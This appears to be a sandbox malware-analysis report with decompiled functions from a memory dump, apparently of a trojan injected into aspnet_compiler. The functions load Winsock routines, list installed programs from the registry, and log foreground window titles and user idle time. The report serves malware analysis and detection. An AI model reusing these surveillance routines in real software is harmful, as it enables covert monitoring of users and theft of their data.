                0x0044dec8
                0x0044decb
                0x0044decb
                0x00000000
                0x0044dec1
                0x0044de9b
                0x0044de88
                0x0044de60
                0x0044ddc1
                0x0044dd1a
                0x0044dd1a
                0x0044dd1d
                0x0044dd4e
                0x0044dd4e
                0x0044dd50
                0x0044dd60
                0x0044dd65
                0x0044dd6a
                0x0044dd70
                0x0044dd73
                0x0044dd75
                0x00000000
                0x0044dd77
                0x0044dd77
                0x0044dd7d
                0x00000000
                0x0044dd7f
                0x0044dd89
                0x0044dd8e
                0x0044dd93
                0x0044dd96
                0x0044dd9c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dd9c
                0x0044dd7d
                0x0044dd52
                0x0044dd52
                0x00000000
                0x0044dd52
                0x0044dd1f
                0x0044dd1f
                0x0044dd25
                0x00000000
                0x0044dd27
                0x0044dd27
                0x0044dd2c
                0x0044dd2e
                0x0044dd9e
                0x0044dd9e
                0x0044dda4
                0x0044dda4
                0x0044dda6
                0x0044dd3b
                0x0044dd3b
                0x0044dd3b
                0x0044dd3e
                0x0044dd3f
                0x0044dd46
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0044dd2e
                0x0044dd25
                0x0044dd1d
                0x0044dd14
                0x0044dce4
                0x0044dcbd
                0x0044dcbd
                0x0044dcc2
                0x0044dcc8
                0x0044dd49
                0x0044dd4d
                0x0044dd4d
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$EnvironmentVariable$_wcschr
                • String ID:
                • API String ID: 3899193279-0
                • Opcode ID: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                • Instruction ID: 70a147eeefff8d80a420db1d2de74d9c70af01ffcddfc6d33a5ace776a2fbf8c
                • Opcode Fuzzy Hash: dcae89719070f5e43a69685a16df3d7dfddf94d936716f055945bb6679d207b1
                • Instruction Fuzzy Hash: B0D137B1D01701ABFB30AF76D882A6E7BA4AF05718F04456FF94597382EB3D9840879C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004140CD Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004140CD() {
				char _v264;
				char _v532;
				intOrPtr _v536;
				CHAR* _v540;
				intOrPtr _v544;
				CHAR* _v548;
				intOrPtr _v552;
				_Unknown_base(*)()* _t42;
				signed int _t52;
				struct HINSTANCE__* _t54;
				struct HINSTANCE__* _t57;
				intOrPtr* _t63;
				void* _t64;

				 *_t63 = "getaddrinfo";
				_v552 = E00413C51;
				_v548 = "getnameinfo";
				_v544 = E00413EF7;
				_v540 = "freeaddrinfo";
				_v536 = E00413C16;
				if( *0x474a88 == 0) {
					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
						E0044030E( &_v532, 0x10c,  &_v264);
						E00440368( &_v532, 0x10c, "\\ws2_32");
						_t64 = _t63 + 0x18;
						_t57 = LoadLibraryA( &_v532);
						_t54 = 0;
						if(_t57 == 0) {
							L6:
							E0044030E( &_v532, 0x10c,  &_v264);
							E00440368( &_v532, 0x10c, "\\wship6");
							_t64 = _t64 + 0x18;
							_t57 = LoadLibraryA( &_v532);
							if(_t57 != 0) {
								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
									FreeLibrary(_t57);
									_t57 = _t54;
								}
								if(_t57 != 0) {
									goto L10;
								}
							}
						} else {
							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
								FreeLibrary(_t57);
								_t57 = 0;
							}
							if(_t57 != 0) {
								L10:
								_t52 = _t54;
								while(1) {
									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
									 *(_t64 + 0x14 + _t52 * 8) = _t42;
									if(_t42 == 0) {
										break;
									}
									_t52 = _t52 + 1;
									if(_t52 < 3) {
										continue;
									} else {
									}
									L15:
									if(_t57 != 0) {
										do {
											 *((intOrPtr*)(_t54 + 0x46f9fc)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
											_t54 = _t54 + 8;
										} while (_t54 < 0x18);
									}
									goto L17;
								}
								FreeLibrary(_t57);
								_t57 = _t54;
								goto L15;
							} else {
								goto L6;
							}
						}
						L17:
					}
					 *0x474a88 = 1;
				}
				return  *0x46f9fc;
			}
















                0x004140da
                0x004140e1
                0x004140e9
                0x004140f1
                0x004140f9
                0x00414101
                0x00414109
                0x00414124
                0x00414141
                0x00414151
                0x00414156
                0x0041416a
                0x00414172
                0x00414176
                0x0041418d
                0x004141a0
                0x004141b0
                0x004141b5
                0x004141c3
                0x004141c7
                0x004141d3
                0x004141d6
                0x004141d8
                0x004141d8
                0x004141dc
                0x00000000
                0x00000000
                0x004141dc
                0x00414178
                0x00414182
                0x00414185
                0x00414187
                0x00414187
                0x0041418b
                0x004141de
                0x004141de
                0x004141e0
                0x004141e5
                0x004141eb
                0x004141f1
                0x00000000
                0x00000000
                0x004141f3
                0x004141f7
                0x00000000
                0x00000000
                0x004141f9
                0x00414200
                0x00414202
                0x00414204
                0x00414208
                0x0041420e
                0x00414211
                0x00414204
                0x00000000
                0x00414202
                0x004141fc
                0x004141fe
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0041418b
                0x00414216
                0x00414219
                0x0041421a
                0x0041421a
                0x0041422f

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 0041411C
                • LoadLibraryA.KERNEL32(?), ref: 0041415E
                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041417E
                • FreeLibrary.KERNEL32(00000000), ref: 00414185
                • LoadLibraryA.KERNEL32(?), ref: 004141BD
                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004141CF
                • FreeLibrary.KERNEL32(00000000), ref: 004141D6
                • GetProcAddress.KERNEL32(00000000,?), ref: 004141E5
                • FreeLibrary.KERNEL32(00000000), ref: 004141FC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                • API String ID: 2490988753-744132762
                • Opcode ID: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                • Instruction ID: ec032a2b9b2afcf1944104fdbdee5c9b5016f8d194ad9eb48286684fedf55356
                • Opcode Fuzzy Hash: d30bf5144b07c6523917f2ebe4b756d5bb383713da0f8795a0bb91b899a473ae
                • Instruction Fuzzy Hash: 4A31B1B250671167D320DF65DC48ECB7ADCAB84794F040A6AF844A3201E73CDAD48BAF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041B008 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E0041B008(void* __ebx, void* __ecx, void* __edx) {
				char _v1028;
				char _v1052;
				void* _v1056;
				char _v1076;
				void* _v1080;
				char _v1100;
				void* _v1104;
				char _v1124;
				void* _v1128;
				char _v1148;
				void* _v1152;
				char _v1172;
				void* _v1176;
				char _v1196;
				void* _v1200;
				char _v1220;
				void* _v1224;
				char _v1244;
				void* _v1248;
				char _v1268;
				void* _v1272;
				char _v1292;
				void* _v1296;
				char _v1316;
				void* _v1320;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v1460;
				void* _v1464;
				char _v1484;
				int _v1488;
				void* _v1492;
				void* _v1496;
				void* __edi;
				void* __ebp;
				long _t73;
				long _t79;
				int _t86;
				void* _t188;
				int _t207;
				void* _t208;
				void* _t210;
				void** _t211;

				_t188 = __edx;
				_t130 = __ebx;
				_t211 =  &_v1496;
				_t208 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
					_v1488 = 0x400;
					_t207 = 0;
					E00401F66(__ebx,  &_v1460);
					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
					_t210 = RegCloseKey;
					while(1) {
						__eflags = _t73 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							L8:
							_t207 = _t207 + 1;
							__eflags = _t207;
							_v1488 = 0x400;
						} else {
							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
							__eflags = _t79;
							if(_t79 == 0) {
								E0041296F( &_v1484, _v1496, L"DisplayName");
								 *_t211 = L"Publisher";
								E0041296F( &_v1340, _v1496);
								 *_t211 = L"DisplayVersion";
								E0041296F( &_v1364, _v1496);
								 *_t211 = L"InstallLocation";
								E0041296F( &_v1388, _v1496);
								 *_t211 = L"InstallDate";
								E0041296F( &_v1412, _v1496);
								 *_t211 = L"UninstallString";
								E0041296F( &_v1436, _v1496);
								_t86 = E0040619C();
								__eflags = _t86;
								if(_t86 == 0) {
									E0040323D(E00402FF4(_t130,  &_v1316, E00402FF4(_t130,  &_v1292, E004042FD(_t130,  &_v1268, E00402FF4(_t130,  &_v1244, E004042FD(_t130,  &_v1220, E00402FF4(_t130,  &_v1196, E004042FD(_t130,  &_v1172, E00402FF4(_t130,  &_v1148, E004042FD(_t130,  &_v1124, E00402FF4(_t130,  &_v1100, E004042FD(_t130,  &_v1076, E004087F0( &_v1052,  &_v1484, _t210, "\t"), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, _t149), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, _t149), _t207, _t210, __eflags, "\n"));
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
									E00401EE9();
								}
								RegCloseKey(_v1496);
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								E00401EE9();
								goto L8;
							}
						}
						__eflags = 0;
						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
					}
					RegCloseKey(_v1492);
					E00403242(_t130, _t208, _t210, __eflags,  &_v1460);
					E00401EE9();
				} else {
					E0040415E(__ebx, _t208, _t188, 0, 0x46a8f0);
				}
				return _t208;
			}

















































                0x0041b008
                0x0041b008
                0x0041b008
                0x0041b01d
                0x0041b032
                0x0041b049
                0x0041b051
                0x0041b053
                0x0041b06e
                0x0041b074
                0x0041b329
                0x0041b329
                0x0041b32e
                0x00000000
                0x00000000
                0x0041b07f
                0x0041b081
                0x0041b302
                0x0041b302
                0x0041b302
                0x0041b303
                0x0041b087
                0x0041b09f
                0x0041b0a5
                0x0041b0a7
                0x0041b0ba
                0x0041b0ca
                0x0041b0d1
                0x0041b0e1
                0x0041b0e8
                0x0041b0f5
                0x0041b0fc
                0x0041b109
                0x0041b110
                0x0041b11d
                0x0041b124
                0x0041b12e
                0x0041b133
                0x0041b135
                0x0041b22b
                0x0041b237
                0x0041b243
                0x0041b24f
                0x0041b25b
                0x0041b267
                0x0041b273
                0x0041b27f
                0x0041b28b
                0x0041b297
                0x0041b2a3
                0x0041b2af
                0x0041b2bb
                0x0041b2bb
                0x0041b2c4
                0x0041b2ca
                0x0041b2d3
                0x0041b2dc
                0x0041b2e8
                0x0041b2f4
                0x0041b2fd
                0x00000000
                0x0041b2fd
                0x0041b0a7
                0x0041b30b
                0x0041b323
                0x0041b323
                0x0041b338
                0x0041b341
                0x0041b34a
                0x0041b034
                0x0041b03b
                0x0041b03b
                0x0041b35a

                APIs
                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B02A
                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B06E
                • RegCloseKey.ADVAPI32(?), ref: 0041B338
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnumOpen
                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                • API String ID: 1332880857-3714951968
                • Opcode ID: caa8abd2def5c508c163a2c121a583cfa03ca2e495a1e4b2994f93ac4004333b
                • Instruction ID: 996ba4e169512d105bf10ccdef0111c5bf25efe0ecf00969fbd19f1ec1e96d73
                • Opcode Fuzzy Hash: caa8abd2def5c508c163a2c121a583cfa03ca2e495a1e4b2994f93ac4004333b
                • Instruction Fuzzy Hash: 688123711082459BD324EB51D891EEFB3E8EF94308F50493FF586921D2EF349949CA9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040A249 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 156sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E0040A249(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				void* _t125;
				signed int _t126;
				void* _t128;

				_t112 = __edx;
				_t128 = (_t126 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E0040AE7E(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
					if(_t36 != 0) {
						_t57 = E0040245C();
						GetWindowTextW(_t77, E00401EE4( &_v100), _t57);
						_t112 = 0x474c34;
						if(E0040AF46(0x474c34) == 0) {
							E0040AE66(0x474c34,  &_v100);
							E004086B8(E0040245C() - 1);
							_t128 = _t128 - 0x18;
							_t137 =  *0x47308b;
							if( *0x47308b == 0) {
								_t112 = E0040AEF6( &_v76, L"\r\n[", _t125,  &_v108);
								E00402FF4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
								E00409BA9(_t119);
								E00401EE9();
							} else {
								E004086D0(_t77, _t128, 0x474c34, _t137,  &_v108);
								E0040A6DA(_t77, _t119, _t137);
							}
						}
					}
					_t83 = _t119;
					E0040ACBE(_t119);
					if(E0041A641(_t119) < 0xea60) {
						L18:
						E00401EE9();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E0041A641(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E00440751(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E00408832(_t77,  &_v80, E004052DD(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402073(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
								_t128 = _t128 + 0xc - 0x14;
								_t112 = _t50;
								E0041A7B9(_t128, _t50);
								E00409BA9(_t119);
								E00401FB8();
								E00401FB8();
								E00401FB8();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E00401EE9();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}
























                0x0040a249
                0x0040a24f
                0x0040a252
                0x0040a253
                0x0040a255
                0x0040a257
                0x0040a2b6
                0x0040a2c2
                0x0040a2c5
                0x0040a2cf
                0x0040a2d7
                0x0040a2de
                0x0040a2e8
                0x0040a2f9
                0x0040a2ff
                0x0040a30f
                0x0040a31b
                0x0040a32f
                0x0040a334
                0x0040a33b
                0x0040a342
                0x0040a36c
                0x0040a370
                0x0040a378
                0x0040a381
                0x0040a344
                0x0040a347
                0x0040a34e
                0x0040a34e
                0x0040a342
                0x0040a30f
                0x0040a386
                0x0040a388
                0x0040a399
                0x0040a441
                0x0040a445
                0x00000000
                0x0040a39f
                0x0040a39f
                0x0040a3a3
                0x0040a3b3
                0x0040a3ba
                0x0040a3da
                0x0040a3dd
                0x0040a40e
                0x0040a413
                0x0040a416
                0x0040a41a
                0x0040a421
                0x0040a42a
                0x0040a433
                0x0040a43c
                0x00000000
                0x0040a43c
                0x0040a3bc
                0x0040a3c3
                0x0040a3c7
                0x0040a3c7
                0x0040a453
                0x00000000
                0x0040a453
                0x0040a399
                0x0040a45a
                0x0040a460

                APIs
                • __Init_thread_footer.LIBCMT ref: 0040A2AB
                • Sleep.KERNEL32(000001F4), ref: 0040A2B6
                • GetForegroundWindow.USER32 ref: 0040A2BC
                • GetWindowTextLengthW.USER32(00000000), ref: 0040A2C5
                • GetWindowTextW.USER32 ref: 0040A2F9
                • Sleep.KERNEL32(000003E8), ref: 0040A3C7
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                • String ID: [${ User has been idle for $ minutes }$4LG$4LG$4LG$]
                • API String ID: 911427763-2724478313
                • Opcode ID: 560d23aef3dedd24e24c6dd58de219cfa617ce7004318b0a0caaee29960e069e
                • Instruction ID: e6d26ec29f6efd9614cca4dfe6135636dd5a7624a68a80ed8f9da63f1efc7c64
                • Opcode Fuzzy Hash: 560d23aef3dedd24e24c6dd58de219cfa617ce7004318b0a0caaee29960e069e
                • Instruction Fuzzy Hash: 3351C3316083405BC314FB71D886A6F77A5AB94308F40097FF886A62E2DF7C9A55C69F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041BE9A Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E0041BE9A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x472b1c = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x472b20);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x472b10) == 0) {
							ShowWindow( *0x472b10, 9);
							SetForegroundWindow( *0x472b10);
						} else {
							ShowWindow( *0x472b10, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x472b1c, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                0x0041bea2
                0x0041bea5
                0x0041bf76
                0x0041bf83
                0x0041bf8b
                0x0041bf91
                0x00000000
                0x0041bf91
                0x0041beab
                0x0041beb0
                0x0041bf5f
                0x00000000
                0x00000000
                0x0041bf68
                0x0041bf70
                0x0041bf70
                0x0041bebb
                0x0041becb
                0x0041bed0
                0x0041bf2d
                0x0041bf47
                0x0041bf53
                0x0041bf2f
                0x0041bf37
                0x0041bf37
                0x00000000
                0x0041bf2d
                0x0041bed5
                0x0041bef4
                0x0041befd
                0x0041bf17
                0x00000000
                0x0041bf17
                0x0041bed7
                0x0041beda
                0x0041bedd
                0x0041bee2
                0x00000000
                0x0041bee5
                0x0041bebd
                0x0041bec0
                0x0041bec3
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041BEE5
                • GetCursorPos.USER32(?), ref: 0041BEF4
                • SetForegroundWindow.USER32(?), ref: 0041BEFD
                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041BF17
                • Shell_NotifyIconA.SHELL32(00000002,00472B20), ref: 0041BF68
                • ExitProcess.KERNEL32 ref: 0041BF70
                • CreatePopupMenu.USER32 ref: 0041BF76
                • AppendMenuA.USER32 ref: 0041BF8B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                • String ID: Close
                • API String ID: 1657328048-3535843008
                • Opcode ID: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                • Instruction ID: dfe43188851c1a6f81b140f94b5f6a7c696d7e25908ee8c8785907bb885635e0
                • Opcode Fuzzy Hash: 671d0a36089a7764a87accef62fbf46538a6333771b6ae1721ed7aed7857f9ea
                • Instruction Fuzzy Hash: AC212631108209BFDB054FA4ED0DEAA3B65FB08312F104539FE05A01B1D7B6D9A1EF59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00444657 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00444657(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46f00c; // 0xd60a1515
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x45b890;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x45bb10;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x45bc90;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E004338BB(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E004443F4(_t172, 1, 4);
					E00445002(_t170);
					_v32 = E004443F4(_t172, 0x180, 2);
					E00445002(_t170);
					_v36 = E004443F4(_t172, 0x180, 1);
					E00445002(_t170);
					_v40 = E004443F4(_t172, 0x180, 1);
					E00445002(_t170);
					_t197 = E004443F4(_t172, 0x101, 1);
					_v52 = _t197;
					E00445002(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E00445002(_v44);
						E00445002(_v32);
						E00445002(_v36);
						E00445002(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E004496E6(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E004496E6(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E0044F9AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E00445002( *(_t215 + 0x90) - 0xfe);
										E00445002( *(_t215 + 0x94) - 0x80);
										E00445002( *(_t215 + 0x98) - 0x80);
										E00445002( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E00445002(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E004516F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                0x0044465f
                0x00444666
                0x0044466b
                0x0044466e
                0x00444671
                0x00444674
                0x00444677
                0x0044467d
                0x00444680
                0x00444683
                0x00444686
                0x00444689
                0x0044468e
                0x004449ae
                0x004449b0
                0x004449b2
                0x004449b2
                0x004449b5
                0x004449bb
                0x004449bd
                0x004449c3
                0x004449c9
                0x004449d3
                0x004449dd
                0x004449e4
                0x004449f4
                0x004449f4
